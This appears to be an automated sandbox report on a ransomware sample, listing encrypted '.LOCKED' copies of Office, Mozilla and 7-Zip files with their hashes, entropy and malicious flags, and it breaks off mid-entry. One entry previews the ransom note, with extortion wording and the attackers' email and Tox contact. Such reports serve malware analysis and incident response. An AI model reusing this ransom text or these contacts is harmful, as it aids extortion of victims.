                                Preview:k...S.......3...6...i.7fp?%..]%...9..l.......t.~..z...............v.!./...1.K.}....C.y."..Yv....<..u..*..........r...11.@.13.b...s4.1..}..s..x.V.r......%...z.\.{..$....a.y.C3..B....T$.....h/....tQ...[.....Rs^....h.~.G.=.C..S....F<<....1.*.t.]....X...j..O.$....#.......O.pr.c..7JZl...LDB....h..5...L......M$c{.sa.....JJ.p`-...U[2..^6...n96.(M......o....e4.l9.pf..T.p...'.._..q.2H............'8......W.....Yv....[....[....8..3@G.Q/......o...%....P..!....l].U'......}d..0..\h1.8E6.1......r...Q..~.Cp<.JCW.,0.I.*.}.\.........n.g.}.@..4).|kn.o....9.c`Yu..j.Z,D..{{.P....wi..y........[..b...uV..,..M.`f..H...}.^T.=<.T...c>M.&4Q....h^.;.V....j.....`.V.]Or5.v..J.).....r./. ..'.A..A`N...^w...5..=..=RD....X[..%.e.....R/.s.Z....:.I.B..........uph.....z.g(%....7.....P...e.R.[.G...:.....~........(.snOON.p.w"6.%..wB...O........s.........Y.E.=..O..-0PU#...Q...)..\N....r..%$.m......FJ......_....k[2.?..&.\...>.<.\.I....(c..v-.7.}..s/C...Yz......|...B.}z.W..?)..~

                                C:\Program Files (x86)\microsoft office\root\vregwow6432\office.x-none.msi.16.x-none.vreg.dat.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1835616
                                Entropy (8bit):5.449303450297782
                                Encrypted:false
                                SSDEEP:24576:7mQ0JlVkITxwioiEDH3i+Hj1D+fnuEVW2UF8:7X0JliIDoxDXR4fnn7UF8
                                MD5:5F3DB0257DB5BEC996BE65DE136CE8D8
                                SHA1:86EC10C9C63A2D30E116F51213D723E2C270928D
                                SHA-256:290F22C4695AC005C1648B37C85C28CD058B54B0753F0518C7976BDA3147A147
                                SHA-512:31655D28217622FDB2D6ED4EF7AA25C1126437D9136500945EC41A6BFD351060169744F22F328A81387E4417C4149F23ABEB9CA1ECEE57D33F9A3FB501AD329D
                                Malicious:false
                                Preview:Q...a...F._U.....8....J.Br ,).{...I..-z.R.e]6..}.1.1.....Q.q.[.BE..:>.r..;.......O.C..[<h;sl.9.5.1d....9...H>4rOO..Nt..}.O$Mc.)qR..,.f,.2.._.....g,-8--...........:L.... !....L..}#h t.;...*.C.....>...t.jj..QLFY..N.h.W.4.Y.1...VA8.`.P..D.....T.........@Br..8Z/TM.~p..I..:D..G2N|.V....w...%.....l....>.Ae+.c...Fp|..f....a.....fBFv..z.~.........[f...k.\\i.JJ..q..Hk.zZ....G....a....yD..........'.^.B..w..q\~zy...(....P>M..<.u.BP .9.......IknX).~..5[....A".P...8..=GTb.........2.C.TT........E.Sr.y..K..H..."R.Y0.}...^k.i.\..,..M....W....."c.'.1S|Gh..4.....q6.u..xy..[...bv...NH.....i.........;..n.%L...xOeB.i./.[?.B-....e.q.......R).o...A...:...t.....Q.H4....Gnwi..ih..4}.j.h..%..4..i.X.3,.\Xw.j.p...b.vqT..C....W!.....S.Q.2..]/D.2...sX...a.c/.P.(..S..6..Q]B..kZ)+xR..`.......>-....8.J5.b........2........~.Uy.A...y..h...}A....R.o}...l'.P.....#..a.."U...JX..S`<[.W...4....ti>..J]!s$.L.."...S.!.P.C;.....Z.:..L.T.G.....?...S... .......T.....$..$0@.a@....x.....c.^....

                                C:\Program Files (x86)\microsoft office\root\vregwow6432\office64mui.msi.16.en-us.vreg.dat.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):33376
                                Entropy (8bit):7.993690549160133
                                Encrypted:true
                                SSDEEP:768:zx6DE4qiCbOX/a/JGXyz1uhCm4W/01XZ9yzoKYh/2xM0:N8ZnCiqJXc7n0Pyzo14xx
                                MD5:49B37FA72913A19605D45FACB470F8ED
                                SHA1:F34096EE71BD4D783834241D7F1187E9675471C6
                                SHA-256:9DEC9A84B64739BFC18091DA4263DACACF60079DEE309293BA81403D18341DE5
                                SHA-512:9980931FE564BAC39C0895CC65C508ECAF07F7519CEC4E324139EC93158BD3148E8A5183E3F4197614494A7EAF5E65CDBA461EC9E3ECDEFD50224595F1E2F7E0
                                Malicious:true
                                Preview:.5.~.Z9.F.c!.O.......z..~.(..!.k..`..f..q.D8?........<..Y4.{.&G..K<..........B..F.X.J.7....#.j.a......a.9..9..\..#.v.....8uz..Y..%.!\.x."=....A. .....k..*.G.......V..?.=..Tzp.7.A.O.G..*..K...'.].$yW10...&...^Y..3l..6maj.J.G......"U....|..g.P.o..ucz.L....Un.*.......d......5...f._8S.Qv.^.a...P.........t1...)..l...[....WZ5C..q4]b.._".x..^.......>...."w.V^...Ph.....2X...a..AG.jR..y|._.xQ..B..xPKLq,..P..{./.(.q...e....Q..0aJ.X.4..'h..... ..Kp...w5...5k..D..W.9...,..f...lC..T.'.c9....w.....<7.C[...1.|..E. .....%u.D.w/.....N...."...W.\...r....#.q..{`;..9eHn. ..ji.a......'P...S|.Z..w.U+......r.....".h.".].....-...t...yx..........t.L...J.).6..CM.5..Q.........".....M..T....q.}p_.X...Cs..c.}..?...+<........f.l.U..:$..>.P..k.O......S.su..r....+..q..ILL...C.1:...D3sB...g.%..g.=!. ..r.Y..u<.......h....I.xk..Y..#5XZ.....s.|...A.....2.I..B..0~.\.....s..C.HV5.._...w..d8.x..../.T.]...).Sh*.5...#.q.9.V.w7..".M..1....bK.c.....wX..9.|.r....^.u.k.

                                C:\Program Files (x86)\microsoft office\root\vregwow6432\officemui.msi.16.en-us.vreg.dat.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):524896
                                Entropy (8bit):6.861562429617699
                                Encrypted:false
                                SSDEEP:6144:OStIehZz64JFcG4Mql+jS/H68uQ9gVf4ibgBerd8GQZ2sBnIjmjnY4cG2:NhZz64ncICH68u4afPYXZvHjY1l
                                MD5:4F0E24439C8E262637F04B87E8A6C962
                                SHA1:81B655FD14F694781C0A162818C15DD78B1C759A
                                SHA-256:D5AB31FFFAA6B4BD77DD9E9A36E3A83DF00AFB96D4AB2601E5A373067880E987
                                SHA-512:993E268D54012636D645E4F85420F47CFA47A65F21EB80A77F98875F9EB715DE5BA0960736B01134AFE7C56CF8D7CD5EA903C74F1CBBC41E1202202BA251A489
                                Malicious:false
                                Preview:..@I.z....a.a>A..[.....8.~(6........,.k..=2..L.W...yQ....b....}..8.kL......Z).P.2.h..9.4L.=..xv....rk)...Nz.g..<.P~....@.b...+Sg(h..d.=.]O#.........Al!...}C.D..,)6&._)t..5..YH..R.j..s..t..z`o.\.Iy~..CY.@|sU.K..ZT..G......~...i\A..p...g-SR;.....{U..C...y.....7....y..k.....h.A....7.tb#.H:%3.,...t)l<..5.s2#e...x..;..Aw.W.<...i*...Rs.".m"s.,mx.."X?z..=........iOh.....6b....w..Wa3.qj..C.......K......+~...m#6.6sY..H.%L$.h5.....2..t..]..F...ob/_P.P.)\.....^=.....^h."^9Y...=48..'J....:......w...{.6..:Kw\.....V.0.a....'O.).#.C.=G._.e........O.LH....).5.[......a.LQ..!*y.........QS$F.p..,j3N.=(.B..-..W...\o...;Cl........{h..z$}A..........2lI.C.....n.YAen...627...-.....0...*>0p.db..2.`/.i..({.....`\....."..4o.....@^z..K.p.VP.......74-.|.~.....s..fq..t.75.b`.#.%,1.Y.._|.W.......v X.|..Ml#gQu..W+5.N..":.s.8ugNq.*..y/.X.........5X....<...r'..)|eJ.o...6...y....7.^..c|noF.k.}==._..R0./...}..n.S.p@....w..(.8.....L..-.pc ..TA.S7...4...:O`$.r.US.!.......

                                C:\Program Files (x86)\microsoft office\root\vregwow6432\onenote.x-none.msi.16.x-none.vreg.dat.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):262752
                                Entropy (8bit):7.999367826948063
                                Encrypted:true
                                SSDEEP:6144:IZNdZdJtxADrmXPRiyaKDUauCDHFP1sayRhS5yqYju0BBFJpA:IZNHj5aKDUaP/oRqSjuQJy
                                MD5:06FBA08C2F6B99E394642F91601CBEE1
                                SHA1:917625C2407D1AB7B470C7BB51748540848200A9
                                SHA-256:63BE3326743630A270D9FD9BB6B5D578779C3F925F5C6CF0448F454D8D569C14
                                SHA-512:947E1EA378BFE394890B08EAA726C7E1DD6EAD5BDF26500B62DBF2E46FCE27E784A81827928849EC3C202AC708A77E501E624B9031562DA0ED352E5FA7DCBBA7
                                Malicious:true
                                Preview:Ag.-8.g..O5i...e..>.K...p....I.... ..}.V..Sl...g...Vz....[.b.......-w... lIM....~....."...[...Q.Q.Wn;zS.o.......n..S..+1...g.](}...(l~...8s.3-L.G.....I...].lD.R...$....G...... .P!...*1....5Ijl(..S...g..2....:.Zz....ks...A?.(5....~.4.L..l.@.l[.Y._..#....)I=-..1..&VqA....0..^O.........P.b....N.~}.g<vW....:...u%b...mJ.*:.$..;\.8.Q......D...._dL'..,U..d...piJ.U^..X.~I....Q.a...._.o.[..t.[3.8'...:ode...U...m.,x....&.j.zU.n.9U7*..EV......$..,.K.:.G>...Y...)k........sV/9S.....3]..VI.i..i..G.~.daP;...SC....']....G|Ua.R.L..).C..|.C..N....].N..`.'.......H..]..|*Am.-..X.70?.W.yxC.W..hRl.Z.....U8nJ..7...s.^......e.k..;C{K.zja*,..S..|..@...l....Y.V.?..$.+..*.....[.....o1p.M.....7.p..E!....DZ>.{..........3#C...&.e...lP.....A.9=......R..S..4M<}..nv.+..L.q.#..9)....;..,jKw..n...d.l.D /6.[^.Q...$...u\Lz!X{........B......2.O....p...I\Z.....T..^12.r.....z..]...._1&....T...t;r.x......_.m...d...v.uvz.......'..3>j...EH..D...."nn.x....j.....Sy....`-.

                                C:\Program Files (x86)\microsoft office\root\vregwow6432\onenotemui.msi.16.en-us.vreg.dat.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):33376
                                Entropy (8bit):7.993995561940174
                                Encrypted:true
                                SSDEEP:768:qi0vWkEyFJ6BDv7wopSdwx74vEea6axIrD39h0w:qi0vkyFoBDzwZK+E8sIvDN
                                MD5:A66B3A13DB79977E06C9001026083671
                                SHA1:F764E894545952264CE414223BA17C347936848C
                                SHA-256:1FAEEDCEAE89BB645AC9A51BE197710FCEC3F11430BB9566C06DB4B5C801D6BA
                                SHA-512:CC13546AEBF3A2A26A567FBA3B8A962A6CAD86758DB281AF4DDFE050E21197976F0889A1E7270848B4A8F97372931DF14D505CCBADABBC6D420F0AB0B20775CB
                                Malicious:true
                                Preview:.@:..m.LG?..L....r.+.<..Ey.X...,.,.[....*.d.L. .u...`?.\G.N...w;..*Xv,...V..Q..pY....r....#....=i.x.R.h........cCn..].......\..@..Fq.a&....G5...+......Vq..K...?.>.u..\.R<.u.I.:..X0.....Q..[a.6/+.W&N.6..,<jd-..t.T...........Q.c.g..h.#F.B.r.c.h.[..9K..I,.-4....P:A..!z.#.8.A...3...r.......?...o.k......]..%..w...p....n.7.eh.......p.^99+7)v).EK..t.....;...e...K(.......vl#y...9..k.gw...3...Bc;.. .....h..+k...P./CP..H.!d.V..[......n.....1m.^.....uQ.P.2...f.[...aX....h.Y/..|...&.......XZ.k.{.h...#.G.a.7T.....36......7h..{...w.)..0w!.....$S@3.......M..X7.`...tB.{z...m....Mm.E.n.`..5F$..Z.7.4..+.....2.ta.L.m...w..M...........2....)............n..N...]l...?........x`.~..I..C.%'.'}...!.8.Q.|.9P.*-.q.5...AKR.ov/8r.b..........;~.4..T%..H..P#.'K.....M.A.w...p.sA..j....4...j%......4S....t.U..XV(.....lXj..k.$"......#....&.D2.D...........X"...R.7......c.......S.......9......."V....\.._.t..%..K.ww.5...d..U.<M/...}....a....}..-I+.9t.lN.{`..v...m..

                                C:\Program Files (x86)\microsoft office\root\vregwow6432\osm.x-none.msi.16.x-none.vreg.dat.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16992
                                Entropy (8bit):7.988851095684504
                                Encrypted:false
                                SSDEEP:384:4SHivq1dz0VLw1cRnhYd6hJHwt4g7rzpvLoOvSrD7X+VOa:dHinwG5hYd6hpqrzVgX7m
                                MD5:2A872608FA94BF72F34B17E728EF7D61
                                SHA1:3A966CC80CD5259D0323D01E05C619CA271840C0
                                SHA-256:CE85B3B45176D6D79EEB9A3CF429602939E0DE4800A68ED5E144F382C1CE30D6
                                SHA-512:10EEC56A69AAAC53CA3CCE6715432F676A99C4D6CF22C3213E47722F1955B1875EC2701BAA39B78340C3417BE92B305A0B61475C8049241F30AEB19A7064DDD6
                                Malicious:false
                                Preview:...N1..S...H.......Q.8.....|Q.e.:L.K&u"..Q.. ...u...>..F...6k...A55..2^J.......1r.*....2H..7-.;_b.6........o...4X.g.!..=N....D._..x.......5.0..a.P|..@..........47......W..../.:....D:p.t..@....H...rZ0L.d.t..P...dm. .L.m..!...$.._a....%.etj..~.?...q[.?._Q......B..k\)....].....J. ...V....:p...R.B.*l..P4.....0.I...w.j.........14..H...w.o.d,1cge..I.m.K~Yp...vf..P.N.Sb:...U.N[W.U.U+I`.C_.K....Kh.J...|).0.~.....+.T......(1..P..6L..6~......Q.~........N.>.b.e..i4...hdxZ.F..WD...i..m..oU.O/....v.$.U.......,4.....pM.......u.&^.....tH....c(.`_.....%...at*....;?f..|..F8W4j.td..m..\.|....._@.. ..&#.._p.2}....-eL(.E.\.Xq.v.. .lP.F[.vNI.D..D..%<.o].Sjp.R...'..^...Y...~,.:.xr.......?........Hi.;l.p....`4S5.I../.d$..(..H...`..C......h...kc..eg....6.._.....8.\.&.&..........m......b.....v..>+..e..@......P.S....x........S....^...._0..#ck..7^..d..JcGr.....rg...9.w:-~.....wS.#.,e......1...y.L....e....2].r.r..A.....42g..{...<..S....0..nglv...m.oQS...bC.<`..

                                C:\Program Files (x86)\mozilla maintenance service\Uninstall.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):104002
                                Entropy (8bit):7.9980319293466735
                                Encrypted:true
                                SSDEEP:3072:ohBmlGbGArp8BcJEWekizUZ5+bwwny3O4EJjV:ohBjKArCBcJEJkeUajnye4yV
                                MD5:B04EE71D5F6269D35BF1410D4B7D8651
                                SHA1:516836F2B9AE0D66B19885A004F4A730F3E90D27
                                SHA-256:6B03EBFEA22E71F1A38BFDA19780B45E9E90A84F410BB697A321666610E5B871
                                SHA-512:7597F94441DBB2A6C3D64C63C3D5009B3D41A5E96F2F154A0F94A2FBFB7A8A3518FA61BEFC0E9074264776747CD23A9BC95323371A0E314CA6210AF629A01CCA
                                Malicious:true
                                Preview:..}........g.]s..+.h.+..`s.....!...U5...zR.....".".fz......z.D.4.H.l...3..2......{.......kw.../.I.".o....lh../O..z....S...<....Q....Y..2..^.p..j.X$....Z.Fq..Iy....8+F....8..G...0..C.r....w..S.../2W..L...@..g...h2.K..jL.R.X..F..d...Og.m...T.hm...@.p.?..L\x"*......H..+.ZT0z....n...I.8..z....V.sn4....w.v......b....w..3.....E_$..x......s&.r;p.. _tn..U.jXT.h..q+'4,Ce+..X....4..W..e.RKY^."..0..Cc...t%..OH,.).. `...t|'W..n.. ...X<^..C.P.....LL.*.T.i...`.(.a.V..&....W..I~g.H.6'..'...W(TX...)..M.'!B.nPN...c~...h<i}.W..UC:).U..J.......u...Z(H.>......W..qpJ(JR.XW.^.f.S..g.6.4.B.[...n,yC.m...X.,.(...n.....m*.....V.....]..$t...E..6:..z.1.4..Gy.+..-*....O...nr...j......t2b..S_MZ.6.Y......K.C1.J.O?lb....}.~\b>..^"T...@.?B..0..1.8.(....;_P...*..}...|.....84...........p.r....O.....6f.%.7...1..N?I.X.......A...+.1...4E..]q.U..'.....%....]..H.1s.;X..}.*..B.mJ..[....#.n...'.j 3..,....[.s..N:R.9.....m.Z...^.....v...g....9.>.4gUT.c.....v.F..,.3....D...n.z

                                C:\Program Files (x86)\mozilla maintenance service\maintenanceservice.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):239616
                                Entropy (8bit):7.9992979133215085
                                Encrypted:true
                                SSDEEP:3072:6uzCX8yp60RzK9l1WWBhahIHudxHlPtgzyraOO2G2BNmqG1UrqwGaUci3R+sjCys:7Mc0E9FiBX7JLLNPZK3/SpIZhAj
                                MD5:1B064D2CDBFC2822BFC1D33DE8D4E570
                                SHA1:331073493E3FF4F3F829EA1528158E25F9EF6D04
                                SHA-256:A59CA69D9029FE932411CA0ADEFBC05147A52A3F96E6516DB8AAEA909699D8DA
                                SHA-512:EF0B2895E60FE52B3DB32EFF0096F96C0EC90119AC181160F6557F0267D21688EC48AB5DE25B78BC874548D8CFA83E1297658A67847EB52CA9FCDCC7B15AC35D
                                Malicious:true
                                Preview:l...../'.(..i.h.al ;A..?.\...P..f.:.a2..2.Y.\..@...KX. ..m.Yr...|.|....)H....J..F...3..3^.'.x..J].`..z..w..j...6+*......eJ_..W.e5......D.*....."].E....j..?Z.a..weR..r.g.o..n.B.g...o....0.T0.&.W.qM...9...&..X.....'.(..%.2I...@:.`L........DS.W/3.5R$o..q.M......7.Hl.....f.B..*......X.n..cc.[G=...x..eG....5F._....Z.TN..j.......'.n..4D;B.V...Y.... ../.r.i.^...c.....j.....d...c.A.7..)..T......v...Q*.3.....}..P...6.?.q.z.6!se......6]M....,f...Vcc.&..M.....6u...n.$....n0,.?fo.o.....D}Y..`.u..V...:.?!>....mh.jR..}1....!V.(>.2...aN.}#c(..SIA.4.K..L....v..%*..e..9>.....XuW.D._.=.n.e ............L.>..O......K4..u..P..]...w.,.rna.1..s...[G.7...]{.0,...A....$.U...e.9.............+.t.2.(.....`.h&.t.s+..x.2K5=7..g1. C]?....9..[..K..L.?..9.u.....0..)......A.....E..,&.R....FR..v.=.Pi0..........".~........e.G4L..`n..&>{....ODL..Bh..1..@.p.b=...q...`-...;.PhN...vzy.'...eG.3......V..0...jmuO.....G...Y.p.`;j.,....,o.Q.iKT...(..kXt...... ..c......

                                C:\Program Files (x86)\mozilla maintenance service\updater.ini.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1810
                                Entropy (8bit):7.887694974950454
                                Encrypted:false
                                SSDEEP:48:b3HOZiNZOiKLPdixbh8Yhyd/WyYu+MAVMJg6TZ:TOUGrdixbh9ydevuAVOZ
                                MD5:C69165DA29323A5F78D1142A66BC2772
                                SHA1:D50D613330E1B96BD3EA24ADFCC3F222C25D8E9F
                                SHA-256:209F0761A443ED47BE665CEB9FF90FD155E9F3B3692C5AB2929C20906E46F6C7
                                SHA-512:EE07FE35D61EF4EEECDE16922CCAAB25D5F4359C447831F3296B025E0C91C1D823DE434DC29F0B5F89A890F890E09D7D1FCCC6DD107124F5A10A73DBEEA5E258
                                Malicious:false
                                Preview:_.F..H..+..B.e]...g..q...iSC...r.R.......5P.\......a}...n.._r2(.(..j. Z.l,...o.T............0^>.....M..X...|.(.%.k]J\.k0..(..Y/..y....o.>.lu..]..*[.~. ...5.ca.A.1.]...Z....G<d...a1......m.m.b..n..W.b....Y"\uD..;.G.W'..7z.)......ra4..O....V..;.`.XA...L-.;w.....k...........QE..bz?<..F).+..Q.^8.f....l.u....N.q.FE..J.!E$...........]...#.'^..v.y...\..'q*?. .Y...n..K.4E..l..R.p.. ..R%X....j.7n.6...%.........3.kB...e........=.R..i..}x0i.wY..o.[...}.(C]da..&HJ.cv....<t.zgcX....6"..Z.\6...%..xp6..&L.8%.....c.R.*.U....8E...k.......Lu.....V."l5. ..n....._-.G....'.Vwu."..plzp. ..\....0......0.K...c.".....{..."j..3.....G`Je......p><i.e....x..K.u)V.$ .~.E.&Dx..@*8Uy..B...Qq......./.Y.?..1...._.7d.M....Oe.N .ZU....R$$N.N..f.{*6 e.[.H...u}..]..Yc.......(.M...S$. 7.y.<+es33@..l.".F...t3d.Kfz..W.>..!....T....!~;..:=.g.....AH....oB..{..mz...ml[Xm%.V.Wq.!s..F..e[.....d.].a.....R..E..k.1a.7M.5j......c.Y...j.n...Rz/G...oX.%;.><l.L.~9O..J)..#...1.........

                                C:\Program Files (x86)\msecache\OfficeKMS\kms_host.vbs.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):41900
                                Entropy (8bit):7.996471724365494
                                Encrypted:true
                                SSDEEP:768:oRhNucqUX4BY485ghCg8ub3igCLGw2zjg920xvJmc1Gd+SBkbguNtB:oRZlXh485ghzegC0gs0xvJnGxB0/
                                MD5:A15CA187BE4366D15C4BDA96B7ADBE16
                                SHA1:769CAB5AD42189790DCC5247B2224E2467097338
                                SHA-256:AB149892ECCEC18837C91F75E5D1ABE8210AB356248E4F86DFD08D78EFCB8691
                                SHA-512:AC3805D87C1737919F60D7D9ABD3A5A6CB39C3240477FA335BEA494B313BA68EFD5AB6D3343850A95F3DB243CF51F51F9E9899FC6FC0B775EB9AA3C566E8F450
                                Malicious:true
                                Preview:$.pW..P..jV [......A.8X..i......G.....I..(`.c.Pg 6..J87e..2...jw..h%.".e.x1..S.RD0.....9R.(..L/....k...^.U..i.....,8.x......~.p.f../....T.%(bNV..D%....pN$....n.G:Fs.R9c...h...W.Z.R 7.U.....e...'u9s..!...H...Hg.F.,.j.......b...."...PQ*d.>..D28\Ja.|........a$9[d@Q^....g5.3....-cx....F..P..ls...@tvm..H........R.!h...\v.I...2.U...U.....j.+:S..v....!.,.b)........e.;I..M.R..9....wL.~.N..n}.....oj>r..IV..7S.E3X..h.?..S...B..d.G$...v........Y...5...j...9.+.^+I....$.,../!..r....U.'.tU..x:.n....x..h..a.`..S~/I..X.Ko"...#.w..X".ArK.<.w.B.;x;...~.S./..;.G.....#@N=.u........d..i?O.[N(.$.....8.H.8..l/..HC.K.6.!W.h...x...h...D%......d.A.A...T.P..z.F.P.4-.5s.G.QR.4.......`..`YC..<...$WI....^....f8.S..Mx..[........Ox.-..b..:...0.ju.G"&Y.^.:...3.6...z).(..B.@t..m..Hq:...e#.B..i...Y}H@.v/.rn.n.IO7..t..Z.R..u.s..n..f`....S>....j.+D..k..d.."...;.,..G.....,....;..%..1.&.....{.q...eh..~..9.K.3.</.JFa..;m..b.i.q.{...^:.k..k.h...~...^a..Fj.v..*.T.)..?...l|.

                                C:\Program Files (x86)\msecache\OfficeKMS\kms_host.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3853
                                Entropy (8bit):7.948437641226424
                                Encrypted:false
                                SSDEEP:96:MkG+vsghAhLdF8wDQeT+/G6e6bQ7jyvOqAevuAVOB:pkghkBF8IH6G6e6EsM+VOB
                                MD5:7A27801891A38F95361895D384360272
                                SHA1:F8E225FED54B8AE7B8813EE25000E010D90410B4
                                SHA-256:E84562CF35CCC3C16A2E228AF45E7159E5003E35A28645B4BCEB6E81C21F2F4B
                                SHA-512:2FF3386BBAACE820B3CDBF1E9CEFD009142B99F92B8294B81260542E84B344C739669629946D1E4CDB84F87CC03D1314D633187F9C54BB53DEB878F3AB907325
                                Malicious:false
                                Preview:.....4:.NPD.W.@+..~.35.,.>......i...U.*.d*...}I..j!3.n/..*I.-..?8......Lj..i.w.........!=.1..{..?...$..8y.8......T_..i`...7...=i...E.a....?.#.MR.%t....5.g.Z....fx.67X....r..6@l....a..O.q....U..YS.e.q.......50a....1..0X.......b.F.Z.........!..zl...9-|......U?....q.C.[........7.=...n.....;$....B..O...9..3I.p..kXH(....vrx.S...L....1.>.4Y...Jn....K...Z.....&P.N....W.%.n.'`.=...s..;...2dq/.,..'......'..#.".[...H!....tpEU.'............BI..S.G.Q....ue.... ..8-. ,.}.|......V2.....E}..o.....@..;....<.../?>.%.`.{!.@.I.,.....r"...iJ.F.8%3Lj3.,O V..Wn.+]...O?.T.H..../..Q...L=1n...J...$..,?......../~..W....0!).w'`y.i.VM..N....IU..#L.F.=...ZE0.e.X;....}.j.......[../|.R%.r..9..A....;7>..TS..3........j6..f...6....H..9.".J.+..IlT.g/...].....7L.-.#>....q..$..f.... ..".. ...x..nLr...s>On.....j...F3.....l...l;..55.-...T..1...D..:...MbP.o.fY.s.e..S.t...F....Eo..9..m...6.1T....I..FwDzQ.1.Y..cF|M&...J.n.....{...o..<h.)t:.|p.*hYn....1....d..t.....h4..9.>.

                                C:\Program Files (x86)\readme.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\7-Zip\7-zip.chm

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):115908
                                Entropy (8bit):7.998373210833385
                                Encrypted:true
                                SSDEEP:3072:cqkD56a7D41homKFbcokpi1bF4TP8Acxaag9z28h:cqy/7Shmkpa4wAgaR9zbh
                                MD5:0901A2263495C881B44FCA49874BC530
                                SHA1:65439B92136E9075EEB29B3287AA68E3392855D0
                                SHA-256:0DABE5EA29A2EF1EF0C6B8D0857719FD6353B84CE0AD1A6A166D8F8874A33553
                                SHA-512:39E9435A89361C17FF520104C1FAD28ED21907AA187728827B49618BE858F754D2A0B21768AE786C0FB5D7011AB1E4A13DD04466345A54C2333524198E7E3385
                                Malicious:true
                                Preview:mB.D........:.l.... .....n.v.K.;!R.D....rD....|......U......I'...Lr.KXZT......O..=...n .V.&hi.g.cC..j-.......:..5.XO...C1;.,.........H...Z.....U0-.3...{]..U..A ...qYn81Ac....V..U...$..7P=T.z9...+A1.....N...e.@......(..mq_`../.+Z....cOn....g..|i...E.v.k4.w.A.l...z..o..q$.fV....q.=..#...z...T...f..k...:c.u........A...s...q..-....E...@W..'$..G...}...m,W.b....X.='y..i$.......dD..}..j.)(.)s?...U8+..X.'..".-...eb......b=...>P...Z.....>.>K.O...P.{/nk2:.MP_.n.:@..I...Y.o..|W.R..Q..4.].......m.Q/...u.hs....\~J;...+E.~U.,..I.....w...Ks.{@.3.BM...`.#.n.Q..hv_Q.b..b..5L5.X..........t..`...#N...:%.w..[=?.._....,...........V.TA...z.d...t..z.+.G..m.$a.J..X........X.u.\...i...#...6.rL..G..........r.gJ.&.`..,2...*Gg..BJ.v...N......Nu.....Z....9..nH.Yg.T...G.Y..}.....\....(.....d...b.N.l.A.[..E...!......Y......K.Lj..G....a..'1.."i.h1...[.w.:.o<...[..F.A\..n..Ikp0J.......E..C..r...O.>...(..7yM.%.....#i.7kP....J).i..e......}.^=.4.#......5.}y.@..K.[...;

                                C:\Program Files\7-Zip\7-zip.chm.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):115908
                                Entropy (8bit):7.998373210833385
                                Encrypted:true
                                SSDEEP:3072:cqkD56a7D41homKFbcokpi1bF4TP8Acxaag9z28h:cqy/7Shmkpa4wAgaR9zbh
                                MD5:0901A2263495C881B44FCA49874BC530
